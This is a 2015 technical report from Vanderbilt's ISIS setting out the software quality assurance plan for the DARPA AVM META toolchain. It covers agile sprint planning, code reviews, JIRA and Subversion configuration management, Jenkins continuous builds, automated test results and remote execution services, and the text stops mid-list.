[4076, 4197, null], [4197, 4499, null], [4499, 4693, null], [4693, 4943, null], [4943, 5221, null], [5221, 5434, null], [5434, 5708, null], [5708, 6121, null], [6121, 6358, null], [6358, 6652, null], [6652, 6727, null], [6727, 6924, null], [6924, 7247, null], [7247, 7434, null], [7434, 7692, null], [7692, 7878, null], [7878, 8357, null], [8357, 9077, null], [9077, 9306, null], [9306, 9428, null], [9428, 9743, null], [9743, 9952, null], [9952, 10207, null], [10207, 10323, null], [10323, 10511, null], [10511, 10635, null], [10635, 10781, null], [10781, 11047, null], [11047, 11329, null], [11329, 11755, null], [11755, 11776, null], [11776, 11912, null], [11912, 11939, null], [11939, 12099, null], [12099, 12686, null], [12686, 12715, null], [12715, 12996, null], [12996, 13772, null], [13772, 14540, null], [14540, 15581, null], [15581, 16649, null], [16649, 17367, null], [17367, 17612, null], [17612, 18405, null], [18405, 18708, null], [18708, 19053, null], [19053, 19397, null], [19397, 19691, null], [19691, 20262, null], [20262, 20849, null], [20849, 21124, null], [21124, 21315, null], [21315, 21844, null], [21844, 22215, null], [22215, 22853, null], [22853, 23900, null], [23900, 24444, null], [24444, 25600, null], [25600, 26016, null], [26016, 26587, null], [26587, 26948, null], [26948, 27061, null], [27061, 28150, null], [28150, 28473, null], [28473, 28743, null], [28743, 29000, null], [29000, 29385, null], [29385, 29864, null], [29864, 30542, null], [30542, 30852, null], [30852, 31163, null], [31163, 32319, null], [32319, 32528, null], [32528, 32881, null], [32881, 33310, null], [33310, 33837, null], [33837, 33934, null], [33934, 34080, null], [34080, 34865, null], [34865, 35145, null], [35145, 35582, null], [35582, 35704, null], [35704, 35894, null], [35894, 35998, null], [35998, 36263, null], [36263, 36850, null], [36850, 36878, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 36878, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 36878, null]], "pdf_page_numbers": [[0, 157, 1], [157, 381, 2], [381, 591, 3], [591, 1021, 4], [1021, 1608, 5], [1608, 1893, 6], [1893, 2122, 7], [2122, 2277, 8], [2277, 2321, 9], [2321, 2617, 10], [2617, 2961, 11], [2961, 3260, 12], [3260, 3521, 13], [3521, 3800, 14], [3800, 4076, 15], [4076, 4197, 16], [4197, 4499, 17], [4499, 4693, 18], [4693, 4943, 19], [4943, 5221, 20], [5221, 5434, 21], [5434, 5708, 22], [5708, 6121, 23], [6121, 6358, 24], [6358, 6652, 25], [6652, 6727, 26], [6727, 6924, 27], [6924, 7247, 28], [7247, 7434, 29], [7434, 7692, 30], [7692, 7878, 31], [7878, 8357, 32], [8357, 9077, 33], [9077, 9306, 34], [9306, 9428, 35], [9428, 9743, 36], [9743, 9952, 37], [9952, 10207, 38], [10207, 10323, 39], [10323, 10511, 40], [10511, 10635, 41], [10635, 10781, 42], [10781, 11047, 43], [11047, 11329, 44], [11329, 11755, 45], [11755, 11776, 46], [11776, 11912, 47], [11912, 11939, 48], [11939, 12099, 49], [12099, 12686, 50], [12686, 12715, 51], [12715, 12996, 52], [12996, 13772, 53], [13772, 14540, 54], [14540, 15581, 55], [15581, 16649, 56], [16649, 17367, 57], [17367, 17612, 58], [17612, 18405, 59], [18405, 18708, 60], [18708, 19053, 61], [19053, 19397, 62], [19397, 19691, 63], [19691, 20262, 64], [20262, 20849, 65], [20849, 21124, 66], [21124, 21315, 67], [21315, 21844, 68], [21844, 22215, 69], [22215, 22853, 70], [22853, 23900, 71], [23900, 24444, 72], [24444, 25600, 73], [25600, 26016, 74], [26016, 26587, 75], [26587, 26948, 76], [26948, 27061, 77], [27061, 28150, 78], [28150, 28473, 79], [28473, 28743, 80], [28743, 29000, 81], [29000, 29385, 82], [29385, 29864, 83], [29864, 30542, 84], [30542, 30852, 85], [30852, 31163, 86], [31163, 32319, 87], [32319, 32528, 88], [32528, 32881, 89], [32881, 33310, 90], [33310, 33837, 91], [33837, 33934, 92], [33934, 34080, 93], [34080, 34865, 94], [34865, 35145, 95], [35145, 35582, 96], [35582, 35704, 97], [35704, 35894, 98], [35894, 35998, 99], [35998, 36263, 100], [36263, 36850, 101], [36850, 36878, 102]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 36878, 0.0]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
d7f79aa8f937db17244f6714f158220306b6e937
Institute for Software-Integrated Systems Technical Report TR#: ISIS-15-111 Title: Software Quality Assurance for the META Toolchain Authors: Ted Bapty, Justin Knight, Zsolt Lattmann, Sandeep Neema and Jason Scott This research is supported by the Defense Advanced Research Project Agency (DARPA)’s AVM META program under award #HR0011-13-C-0041. Copyright (C) ISIS/Vanderbilt University, 2015 # Table of Contents List of Figures ........................................................................................................ iii List of Tables ........................................................................................................... iv 1. Introduction ........................................................................................................... 1 1.1 Purpose ........................................................................................................... 1 1.2 Scope ............................................................................................................. 1 2. Applicability ......................................................................................................... 1 3. Applicable Documents ......................................................................................... 2 3.1 Contract Level Documents .......................................................................... 2 3.2 ISIS Governing Documents ........................................................................ 2 3.3 Reference Documents .................................................................................. 2 4. Program Management, Planning and Environment ............................................. 3 4.1 The META SQA Plan ................................................................................... 3 4.2 Organization ................................................................................................. 3 4.3 Task Planning ............................................................................................... 4 4.4 Software Personnel Training ....................................................................... 6 4.4.1 SQA Personnel ........................................................................................ 6 4.4.2 Software Developer Training Certification ......................................... 7 4.4.3 META project management ................................................................. 7 4.5 Tools and Environment ................................................................................. 7 5. SQA Program Requirements .............................................................................. 9 5.1 User Threads as Requirements ................................................................... 9 5.2 Innovation and Improvement ..................................................................... 9 5.3 Program Resources Allocation Monitoring ............................................... 9 5.4 Best practices of software development ..................................................... 9 5.5 Inspections .................................................................................................. 10 5.6 Test Case Management .............................................................................. 11 5.7 Defect Reports and Change Requests ....................................................... 11 5.8 Software and Project Document Deliverables ......................................... 11 5.9 Requirements Traceability ................................................................. 12 5.10 Software Development Process ...................................................... 12 5.11 Project reviews................................................................................ 12 5.11.1 Formal Reviews ........................................................................ 12 5.11.2 Informal Reviews .................................................................... 12 5.12 Test Benches .................................................................................. 13 5.13 Software Configuration Management ............................................. 14 5.14 Release Procedures and Software Configuration Management ......... 14 5.15 Change Control ............................................................................... 15 5.16 Problem Reporting ......................................................................... 15 5.17 Continuous Build ........................................................................... 16 5.18 Services and Resources Provided to AVM ..................................... 19 5.19 Software Testing ............................................................................ 21 5.19.1 Unit Test .................................................................................. 21 5.19.2 Integration Test ......................................................................... 21 5.19.3 Alpha Testing ........................................................................... 21 5.19.4 Beta Testing ............................................................................. 22 5.19.5 Gamma Test ............................................................................. 24 5.20 Meta Release Schedule ................................................................... 26 5.21 Quality Metrics ............................................................................... 26 6 Appendix ........................................................................................... 28 6.1 Coding Documentation Requirements .............................................. 28 6.2 Testing Requirements ....................................................................... 28 6.3 Inspection and Code Review Guidance ............................................ 30 6.4 Sample Checklist ............................................................................ 31 List of Figures Figure 1: META Team Organization................................................................. 4 Figure 2: Spiral Development Cycle.............................................................. 5 Figure 3: Internal Development/Testing Cycle.............................................. 6 Figure 4: High Level Architecture Integration View..................................... 7 Figure 5: JIRA Issue Summary page for META ........................................... 15 Figure 6: Beta Testing Issue Reporting (Beta.VehicleFORGE.org).................. 16 Figure 7: Jenkins interface showing the status of the Meta development branch................................................................. 17 Figure 8: Installer Acceptance Test Checklist ............................................. 22 Figure 9: Core CyPhy Tools Test Checklist .................................................. 25 Figure 10: Core Test Bench Functionality Checklist ..................................... 25 Figure 11: 2014 META Release Schedule.................................................... 26 List of Tables Table 1: AVM Tools at the End of Gamma Testing .................................................................................. 8 Table 2: Automated Tests ...................................................................................................................... 18 1. Introduction 1.1 Purpose The purpose of this Software Quality Assurance Plan (SQAP) is to define the techniques, procedures, and methodologies that will be used at the Vanderbilt University Institute of Software Intensive Systems (ISIS) to ensure timely delivery of software that implements the META portion of the Defense Advanced Research Projects Agency (DARPA) Adaptive Vehicle Make (AVM) program. 1.2 Scope Use of this plan will help assure the following: (1) That software development, evaluation and acceptance standards appropriate for the META program interfaces to the AVM software are developed, documented and followed. (2) That the results of software quality reviews and audits will be available for META program management and AVM program managers to support development, testing, and integration decisions. (3) Important characteristics of the META program affecting quality, maintainability, and stability are documented for potential partners and customers. 2. Applicability The SQAP covers quality assurance activities throughout all development phases of the DARPA AVM Meta Project. This plan represents efforts beginning at the end of the FANG-I program through the remainder of the Meta tool development. While many pieces of the SQAP can be generalized to other ISIS software projects, the DARPA AVM program has unique requirements that require specialized attention, and limit our abilities to conduct a traditional QA process. The following list outlines some aspects of the AVM program related to our QA process. - Research focused – The products generated at ISIS are typically cutting edge research products. These efforts involve technology that has not been developed, so, much of the software is produced by exploration or prototyping. - Agile development is the approach we are following. Requirements are light. Interfaces are defined as needed in consultation with our partners. User Threads provide details of the required functionality. Integration testing is where the bulk of the integration and user requirements are focused. - Changing Requirements – Our process is designed to be adaptive as requirements change and evolve. As the program matures and final products for delivery are assembled, the focus of the SQAP shifts in the following ways: - R&D is no longer a driver. Maturing existing functionality and ensuring effective integration with team contributions is more important. - Agile development continues with more focus on complete seamless execution of user threads. - No new requirements are anticipated; rather fixing, testing, and validating the goals of the user threads is the key point. 3. Applicable Documents The following documents can be used as requirements for the design and manufacture of ACIS software and form a part of this document to the extent specified herein. The issue in effect at the time of contract award shall apply unless otherwise listed below. 3.1 Contract Level Documents META Contract and associated Contract Data Requirements List 3.2 ISIS Governing Documents None applicable 3.3 Reference Documents 4. Program Management, Planning and Environment As the only management level document that is a META program deliverable, the SQAP also documents the basic management and planning functions performed in META. 4.1 The META SQA Plan The META SQA plan is developed to provide META PM with the tools to deliver a robust product for use by industry partners, AVM teammates, and other DARPA/NASA projects. Data collection of metrics that characterize the software product and its quality are central to achieving that goal. Program management and development staff must understand what the metrics mean and take action accordingly. A portion of the project management discipline is expended to review project metrics to ensure the actions taken accomplished the intended results. Finally, the metrics collection, including defect burn down, is an important component of the final delivered open source project. 4.2 Organization The organization with ISIS is project focused R&D activity. Aside from the PIs, there is little in the way of hierarchic structure. QA is not a diffuse activity however, since it remains a major accountability of the project management team. The team’s organization structure is depicted in Figure 1. 4.3 Task Planning Since the META program is being developed as an agile project, tasks are organized by a time box. Typically each spiral is about 4 weeks with 3 sprints, major weeklong iterations, and a final week for focused integration. Since the software is being continuously tested, the metrics are available on a weekly basis and reviewed on a monthly basis as part of the release decision process. The Meta development plan is organized into four-week “Sprints” as depicted in Figure 2: Spiral Development Cycle. At the end of each sprint, a new version of the CyPhy-Meta tool is released to the test community. These four-week sprints are divided into two phases: feature development and stabilization. The feature development phase is when the primary work of designing and implementing new features takes place. The stabilization phase emphasizes deeper testing, as well as the preparation of documentation for internal and external purposes, including BETA test scripts, example and test models, and software architecture documentation. The Spiral Development Cycle diagram depicts the relationship between META team development cycles and BETA testing cycles. While the META team prepares release R+1, the BETA testing group is working with the previous release R+0. Once the META sprint for R+1 has completed, the tools are released to the BETA team for testing, while the Meta team moves on to R+2. During BETA testing of R+1, META tool updates will only be provided for issues that significantly block the testing process. While the next version of the tools is being developed, the previous version is released to beta test. Figure 3 outlines the internal development cycle: Each development group is responsible for collecting their own metrics and using it for planning their work. At the transition between sprints and in dealings with external partners, the project management team is responsible for identifying weaknesses based on the metrics. ### 4.4 Software Personnel Training #### 4.4.1 SQA Personnel No training of SQA personnel is anticipated as the person tasked is the author of the SQA plan and he is also the project manager for META. 4.4.2 Software Developer Training Certification Each member of the software development team has recent software engineering coursework including SQA. Project leads responsible for the largest chunks of META code have industry knowledge of code standards and quality assurance techniques. No certification is required. 4.4.3 META project management The techniques and metrics identified in this document are evolving and should be used based on experience and gap analysis when QA levels are perceived to be dropping. The document provides an organizing framework for collecting, analyzing the data so management can take action and follow-up to verify results are in line with projections. 4.5 Tools and Environment The high level architecture showing the relationships between Model Integration, Tool Integration and Execution Integration platforms is depicted in Figure 4. ![Figure 4: High Level Architecture Integration View](image) META generates tools for the design, exploration, specification, simulation, testing and manufacturing of complex reliable robust systems. It also relies upon software tools for development, synthesis, testing, analysis and reporting functions. The META toolchain entries listed in Table 1 are current as of the end of Post Gamma. <table> <thead> <tr> <th>Tool or Model</th> <th>Current Version</th> <th>Dependencies (other tools and models)</th> <th>Notes (criticality, test tools, etc)</th> </tr> </thead> <tbody> <tr> <td>GME</td> <td>14.3.5</td> <td></td> <td></td> </tr> <tr> <td>Python</td> <td>2.7.6</td> <td></td> <td></td> </tr> <tr> <td>Open Meta-CyPhy</td> <td>14.03.25913</td> <td>GME, Java, Python</td> <td></td> </tr> <tr> <td>Java</td> <td>7.0.550</td> <td>Meta-Link</td> <td></td> </tr> <tr> <td>Dymola</td> <td>14.0.294</td> <td>Dynamics</td> <td></td> </tr> <tr> <td>ProE</td> <td>Creo 2.0 M070</td> <td>CAD</td> <td></td> </tr> <tr> <td>OpenModelica</td> <td>1.9.1Beta2</td> <td>Dynamics</td> <td></td> </tr> <tr> <td>OpenFOAM</td> <td>2.2.0</td> <td>CFD</td> <td></td> </tr> <tr> <td>Abaqus</td> <td>6.13-1</td> <td>FEA</td> <td></td> </tr> <tr> <td>Nastran</td> <td>2013.1</td> <td>FEA</td> <td></td> </tr> <tr> <td>SwRI AVM Tools</td> <td>42</td> <td>GME, Open Meta-CyPhy, LS-Dyna</td> <td>Blast/Ballistics</td> </tr> <tr> <td>LS-PrePost</td> <td>4.1</td> <td>Blast</td> <td></td> </tr> <tr> <td>LS-Dyna</td> <td>7 (rev. 79055)</td> <td>Blast</td> <td></td> </tr> <tr> <td>CTH</td> <td>10.3</td> <td>Ballistics</td> <td></td> </tr> <tr> <td>ForgePort</td> <td>0.6.10.0</td> <td>GME, Open Meta-CyPhy</td> <td>VF tool</td> </tr> <tr> <td>PSU-MAAT</td> <td>1.0.33</td> <td></td> <td>TDP editor</td> </tr> <tr> <td>PSU-HuDAT</td> <td>1.0.8</td> <td>Creo</td> <td></td> </tr> <tr> <td>PSU-RAMD</td> <td>2.2</td> <td></td> <td></td> </tr> <tr> <td>Mayavi</td> <td>4.3.1</td> <td>wxPython 2.8, configobj, Envisage</td> <td>FOV</td> </tr> <tr> <td>C2M2L Modelica Lib</td> <td>R2838</td> <td></td> <td></td> </tr> <tr> <td>C2M2L Lib</td> <td>11</td> <td></td> <td></td> </tr> <tr> <td>Seed Model</td> <td>RC9</td> <td></td> <td></td> </tr> <tr> <td>FEA Seed</td> <td>6.4</td> <td></td> <td></td> </tr> <tr> <td>Comp Spec</td> <td>2.5</td> <td></td> <td></td> </tr> </tbody> </table> Table 1: AVM Tools at the End of Gamma Testing 5 SQA Program Requirements This section defines the SQA review, reporting, and auditing procedures used at VU/ISIS to ensure that internal and external software deliverables are developed in accordance with this plan and contract requirements. Internal deliverables are items that are produced by software development and then integrated with project builds using configuration control procedures. External deliverables are items that are produced for delivery to the META Community. These include scheduled program releases and final configuration deliverables. 5.1 User Threads as Requirements During spiral planning, user threads to accomplish significant complex, chained tasks are defined. These provide insight to developers and testers about the intended use of META. Test cases are defined by external organization (Beta testers, and other AVM contractors) to examine the META behavior in completing the user thread activities. Each release has identified user threads as the major content. 5.2 Innovation and Improvement ISIS as a learning organization has a practice of analyzing current conditions to seek improvement, a structured approach for implementing changes on a small scale that can be measured and a forum for broadcasting those changes and the results to the broader community. Innovation is important to upgrade processes and integrate appropriate technology. ISIS approach to innovation is to collect data to confirm where more effort is spent than value is generated. Using group discussions, different approaches to process change, tool addition, computer resources or other avenues are selected for pilot test. Once improvement is noticed, then the changed is propagated to other groups. 5.3 Program Resources Allocation Monitoring Program resources that are planned and monitored include personnel, computer systems, and software licenses. At the start of each spiral, personnel are assigned to development and test teams. Institutional computer systems are assumed for the development life cycle. Software license needs may change for a variety of reasons, but adjustments are made to ensure the delivered configurations will operate with the appropriate software licenses. 5.4 Best practices of software development A sample of practices that ISIS has applied to their agile development process to increase the quality of final products are listed below. Some of these approaches are a result of either process improvement activities or innovation. Two sets of eyes on every change is a general principle followed during development. Pair programming, peer (code) reviews and commit reviews are all procedures used in order to follow this principle. Pair programming is used occasionally to ensure that code is inspected by 2 people and knowledge is distributed within the team. This method works best in non-routine tasks (e.g. writing new code or debugging a complex algorithm), and sessions should not last for more than 4 hours. Pair programming is also a good practice to quickly bring junior team members on board. Peer code reviews are conducted in order to verify the developed code is of good quality, implements the desired functionality, and will integrate well. While code reviews help achieve these goals, they will not substitute testing and other QA processes. Commit reviews are done by a dedicated person who merges (integrates) the code. During this procedure the person screens the changes made before merging it to the repository main (release) branch. Feature design documentation and reviews are recommended to ensure that the implementation will fulfill the requirements, and developers working on the same feature have a common understanding of the problem and the proposed solution. Before implementing a feature, team members should discuss it and write a 1-3 page document, which would be informally reviewed and accepted as the baseline for the work to be done. Automated tools used for executing (code) tests and static code analysis are in place. Automated test execution tools run tests as a part of the continuous integration process. The tests are executed each time a change is integrated to the release branch. The test results are accessible through a web interface. In case of a test failure, the person(s) who made the change are automatically informed via email. This allows immediate discovery of code breaks. Static code analysis is performed on the source code to ensure adherence to coding style, standards, and to detect bad practices. The static code analysis is executed by the build system for each build. These results are checked periodically by the developers; any significant concerns are reviewed in greater detail. 5.5 Inspections During each sprint within a spiral, code and design are informally reviewed within the development team. These results are often captured informally with the team leaders’ notes. Prior to final delivery, a plan is generated by the project manager to identify the highest impact and highest risk modules for latent defects in the scheduled final delivery. These modules should be the subject of a formal design and code review. Recommended changes should be analyzed for likely impact in earlier deliveries. The first step is an analysis of the JIRA data base and Beta test results to find the most common types of defects. This list is part of the code review package. Second is the principal engineer for the modules being reviewed to provide annotations on what has changed, what test cases have changed to accommodate the code change, and whether any downstream dependencies have been identified. Third is the selection of the review team and chair. Date and time should be set for the review with guidance on how long the time period should be from the appendix on Review and Inspection Guidance. Once the review is complete, the team lead and the principal engineer should list all actions to be taken, identify latent defects, and identify additional testing as necessary. The final review team report should include the closeout of actions, testing, and defect removal and analysis. 5.6 Test Case Management Test cases are developed for both unit testing and thread testing. Unit test cases should be successfully run before spiral integration. Thread test cases should be run during Beta Testing. The results of these test cases are used to define the META capabilities for each release. The META Project Manager maintains a RYG status board of test bench status and META thread capability Status for each delivery. Typically these status charts are presented at the PI meetings or other venues for the META user community. 5.7 Defect Reports and Change Requests Defects in the delivered products are documented by the open tickets generated by the Beta Test Team. Internally discovered defects are covered by the JIRA data base. The most important metrics for management and reporting are: 1. Defect Rate: this is analyzed for module occurrence density, defect source, and time to closure. 2. Defect Insertion Ratio: this is the rate of defects as a result of fixes to other defects. This analysis includes source, missed opportunities to find or prevent the defect, and time to discover it after insertion. 3. Failure Interval is a valuable metric for measuring improvement in stability. 5.8 Software and Project Document Deliverables The META project Manager is responsible for reviewing deliverable software documentation including the META Final Report. Review checklists will be used to review these documents. These reviews will help ensure that documentation is in compliance with applicable contract instructions. Final Report software documentation should include R&D results as well as product documentation. Important contents include: User Thread definitions and their status, user documentation for build, execution and test, and a High Level System Architecture Diagram describing vision and details of the architecture to the development team. Software documentation must be based on some published convention such as found in IEEE Software Engineering Standards Source code commenting requirements should be spelled out in an appropriate appendix. Both Software documentation and comments are covered in code reviews. 5.9 Requirements Traceability Traceability is identified through the use of a spreadsheet matrix which will tie individual Contract End Item (CEI) deliverables and document entries to lower level entries. These Traceability products are produced and maintained by the project manager. 5.10 Software Development Process The META program is developed using an agile process. Control over spiral and sprint contest is established by consensus of the development team and its customers in the META/AVM community at kick off meetings each month. The project manager and team leads review progress during the month and evaluate test results, execution notes, and other teammate’s analysis at the end of the period in build release decisions. 5.11 Project reviews 5.11.1 Formal Reviews Given the R&D nature of the project and the agile method of development, formal reviews are minimized. Almost all decisions are the result of informal meeting or telecons with the extended AVM/META team. 5.11.2 Informal Reviews Where the module interfaces with components generated by other organizations, there is an informal design review held with all organizations affected. The project manager or team lead will ensure all action items generated during this review process are identified and tracked during development. The project management team is responsible for ensuring all action items have been closed. 5.11.2.1 Code Walk-throughs Because of the wide range of languages and tools for auto-generated code, the Code reviews should be tailored based on recent experience for the languages and toolsets used. It is also important to highlight change history and defect history for the modules in review. Eventually, enough history in reviews will build up that bug classes will become important to consider. 5.11.2.2 Baseline Quality Reviews This review ensures that: (1) the code has been tested and meets module specifications, except as noted; (2) that any changes to applicable software module design documents have been identified; (3) that appropriate validation tests have been run; (4) that the functionality of the baseline is documented. (5) that all software design documentation complies with this plan. (6) that tool and techniques used to produce and validate the Software Sub-System are identified and controlled. 5.12 Test Benches Test benches represent environment inputs and composed models connected to a range of testing and verification tools for key performance parameters. Test benches work by composing a user designs and executing the designs in the environment specified in the Test Bench. Tests can range from Finite Element Analysis in the thermal and structural domain to multi-domain analysis using the Modelica language to Manufacturing cost and lead time analysis. The major components of a Test Bench are the workflow definition which defines which analysis tools should be used, the top level system under test which defines the user design(s) that should be tested, the environment inputs which are specific for each type of analysis, and the metrics of interests which will be used to compare designs against a set of requirements for that design. Test benches offer user the ability to rapidly compose designs for a variety of different analysis by using one source model. The goal of this design is to allow users to create a virtual test environment once and run numerous designs through this environment without having to manually set-up each individual design. This also ensures that each design is subjected to the same environment to allow for the best possible comparison of designs. Ultimately the goal is that users spend less time setting up analysis and more time analyzing results to design the best possible product for the requirements. Another goal of Test Benches is to enable rapid response to changing requirements of a design. Again instead of a user manually setting up one of a number of designs in a new environment to assess designs against new requirements, they can modify a few parameters in the Test Bench and begin the analysis of the designs with the updated environment in a matter of minutes instead of days. 5.13 Software Configuration Management Software configuration management is the progressive, controlled definition of the shape and form of the software deliverables. It integrates the technical and administrative actions of identifying, documenting, changing, controlling, and recording the functional characteristics of a software product throughout its life cycle. It also controls changes proposed to these characteristics. As the software product proceeds through requirements, analysis, implementation, test, and acceptance, the identification of programs are identified in the SDP. This assurance process occurs during the Baseline Quality Review mentioned above as its configuration becomes progressively more definite, precise, and controlled. Software configuration management is an integral part of the project configuration management, using the same procedures for identification and change control that are used for documents, engineering drawings, test verification procedures, etc. 5.14 Release Procedures and Software Configuration Management The need for control increases proportionally to the number of individuals that use the products of software development. As a result, different control procedures will be used depending on use. The ISIS software configuration management process revolves around the disciplined use of two tools: software version-control system (Subversion) and a ticket-based tracking system (JIRA). Figure 5 presents an issue summary page from JIRA which is typically reviewed while making work or release decisions. All development tasks are tracked in the JIRA system. Each sprint is associated with a future software release version, with these versions making up the milestones used within the system. All development tasks are tracked with JIRA tickets, including new features, improvements, refactoring, and correction of defects. Each ticket includes a “Target Version,” marked either with an upcoming milestone or with a “backlog” tag. All work for a given ticket typically occurs in a Subversion branch dedicated only to that task. Once the task is completed and has passed alpha testing, the code changes are scheduled to be merged into the relevant software release lines. These dedicated branches create a clear definition of the changes related to a specific issue, allowing the team to reliably apply or remove them to the correct software release versions based on changing conditions, or defer changes to future sprints. Branches are merged during a weekly “Merge Day”. On this day, all completed tasks are merged to the relevant software release lines. The Subversion repository and the JIRA system are also reviewed for inconsistencies, and are corrected if necessary. 5.15 Change Control Change control for software will begin during the integration phase and must start when software identified with a numeric release is given to someone outside of software development for use in their work. 5.16 Problem Reporting The Meta team tracks tasks and reports bugs internally using the previously mentioned JIRA system. Bugs found through informal reviews and unit testing are reported by the developers in JIRA directly. Bugs identified through Beta testing are reported by the test community into the VehicleFORGE (VF) ticket tracking system, depicted in Figure 6. When an issue is verified, the ISIS support team creates a JIRA task based on the VF ticket. This process eliminates “bugs” related to user error, inadequate documentation, etc. ![Image: Beta Testing Issue Reporting (Beta.VehicleFORGE.org)](image) **Figure 6: Beta Testing Issue Reporting (Beta.VehicleFORGE.org)** ### 5.17 Continuous Build The ISIS Meta project utilizes an automated build and testing system to track our tool development. The build and test system, Jenkins\(^1\), is an open source continuous integration tool. Jenkins is written in Java and is a web-based platform. We have deployed a NUnit plugin to enhance our testing capabilities. This process maximizes the level of working software during our development process. Each build is triggered by a developer’s repository check-in. --- \(^1\) [http://jenkins-ci.org/](http://jenkins-ci.org/) The Jenkins system regularly, after every source code change in our version control system, compiles the Meta tools as they are being developed. Builds that do not compile can be diagnosed, with fixes merged into the appropriate build. Figure 7 presents a Jenkins Status Page. The following lists outlines the automate test battery all newly committed code will be tested against. Note that there are several tests within each category; the number is listed in the far right column of Table 2 below. Builds that do not pass the test battery are not possible to merge with the main development branch. <table> <thead> <tr> <th>Package</th> <th>Total Tests</th> <th>Pass</th> <th>Skip</th> <th>Fail</th> <th>Duration</th> <th>Package</th> </tr> </thead> <tbody> <tr> <td>CADTeamTest</td> <td>17</td> <td>17</td> <td>0</td> <td>0</td> <td>41 sec</td> <td></td> </tr> <tr> <td>ComponentAndArchitectureTeamTest</td> <td>25</td> <td>25</td> <td>0</td> <td>0</td> <td>3.7 sec</td> <td>ComponentAndArchitectureTeamTest</td> </tr> <tr> <td>ComponentExporterUnitTests</td> <td>10</td> <td>10</td> <td>0</td> <td>0</td> <td>29 sec</td> <td>ComponentExporterUnitTests</td> </tr> <tr> <td>ComponentImporterUnitTests</td> <td>12</td> <td>12</td> <td>0</td> <td>0</td> <td>1 min 4 sec</td> <td>ComponentImporterUnitTests</td> </tr> <tr> <td>ComponentInterchangeTest</td> <td>47</td> <td>47</td> <td>0</td> <td>0</td> <td>1 min 56 sec</td> <td>ComponentInterchangeTest</td> </tr> <tr> <td>ComponentLibraryManagerTest</td> <td>20</td> <td>20</td> <td>0</td> <td>0</td> <td>5.6 sec</td> <td>ComponentLibraryManagerTest</td> </tr> <tr> <td>CyPhyPropagateTest</td> <td>14</td> <td>14</td> <td>0</td> <td>0</td> <td>52 sec</td> <td>CyPhyPropagateTest</td> </tr> <tr> <td>CyberTeamTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0.16 sec</td> <td>CyberTeamTest</td> </tr> <tr> <td>CyberTeamTest.Projects</td> <td>3</td> <td>3</td> <td>0</td> <td>0</td> <td>1.2 sec</td> <td>CyberTeamTest.Projects</td> </tr> <tr> <td>DesignExporterUnitTests</td> <td>24</td> <td>24</td> <td>0</td> <td>0</td> <td>49 sec</td> <td>DesignExporterUnitTests</td> </tr> <tr> <td>DesignImporterTests</td> <td>9</td> <td>9</td> <td>0</td> <td>0</td> <td>4.9 sec</td> <td>DesignImporterTests</td> </tr> <tr> <td>DesignSpaceTest</td> <td>5</td> <td>5</td> <td>0</td> <td>0</td> <td>2.3 sec</td> <td>DesignSpaceTest</td> </tr> <tr> <td>DynamicsTeamTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0.99 sec</td> <td>DynamicsTeamTest</td> </tr> <tr> <td>DynamicsTeamTest.Projects</td> <td>266</td> <td>266</td> <td>0</td> <td>0</td> <td>2 min 17 sec</td> <td>DynamicsTeamTest.Projects</td> </tr> <tr> <td>ElaboratorTest</td> <td>59</td> <td>59</td> <td>0</td> <td>0</td> <td>38 sec</td> <td>ElaboratorTest</td> </tr> <tr> <td>MasterInterpreterTest.Projects</td> <td>214</td> <td>214</td> <td>0</td> <td>0</td> <td>1 min 57 sec</td> <td>MasterInterpreterTest.Projects</td> </tr> <tr> <td>MasterInterpreterTest.UnitTests</td> <td>6</td> <td>6</td> <td>0</td> <td>0</td> <td>3.1 sec</td> <td>MasterInterpreterTest.UnitTests</td> </tr> <tr> <td>ModelTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>1.1 sec</td> <td>ModelTest</td> </tr> <tr> <td>PythonTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>1 sec</td> <td>PythonTest</td> </tr> </tbody> </table> Table 2: Automated Tests 5.18 Services and Resources Provided to AVM ISIS will configure and maintain a remote execution service to provide execution of Meta Test Benches for the Gamma Test period and pre-test period testing. ISIS will, under this contract, manage and maintain the following items: - Installation and configuration Meta Job Execution Server (*Jenkins*) - Installation and configuration of Meta CyPhy Software installers and dependencies - Installation and configuration of 3rd Party Software necessary for Gamma Test Remote Execution. Note the physical computational resources will be provided by ISIS. Currently 160 VM’s and 20 physical machines have been allocated as remote processing nodes for the Gamma period. The Meta remote processing nodes use the virtual machine environment provided by VehicleFORGE. - Installation and configuration Meta Job Server (*Jenkins1*) The Meta Job Server will need to be updated when the CyPhy software is updated to reflect the proper CyPhy version numbers, etc. so that the remote jobs are routed to the correct job servers. - Installation and configuration of Meta CyPhy Software distributions The Meta CyPhy software will be updated on the dates in the schedule below as well as any other times the Meta CyPhy software updates are released to the Gamma Test community. - November 27, 2013 - Meta 13.18 Install - December 10, 2013 - Meta 13.19 Install - January 6, 2014 - Meta 14.01 Install - January 13, 2014 - Meta 14.01 Final Install following jury period. - January 27 - May 15, 2014 - Gamma updates as needed. - ~ March 28, 2014 - Mid Gamma Content Upgrade. - Installation and configuration of 3rd Party Software necessary for Gamma Test The third-party software necessary for the Gamma Test falls in two categories: ● Software from AVM performers ● Commercial Software. AVM Performer Software: ● SwRI Blast Tools** ● SwRI Ballistics Tools** ● SwRI Corrosion Tools* ● Ricardo Python Based Tools* ● PSU/iFAB Detailed Analysis tool configuration (analysis is performed on PSU resources) ● iFAB Conceptual Analysis Tool* ● iFAB Structural Analysis Tool ● 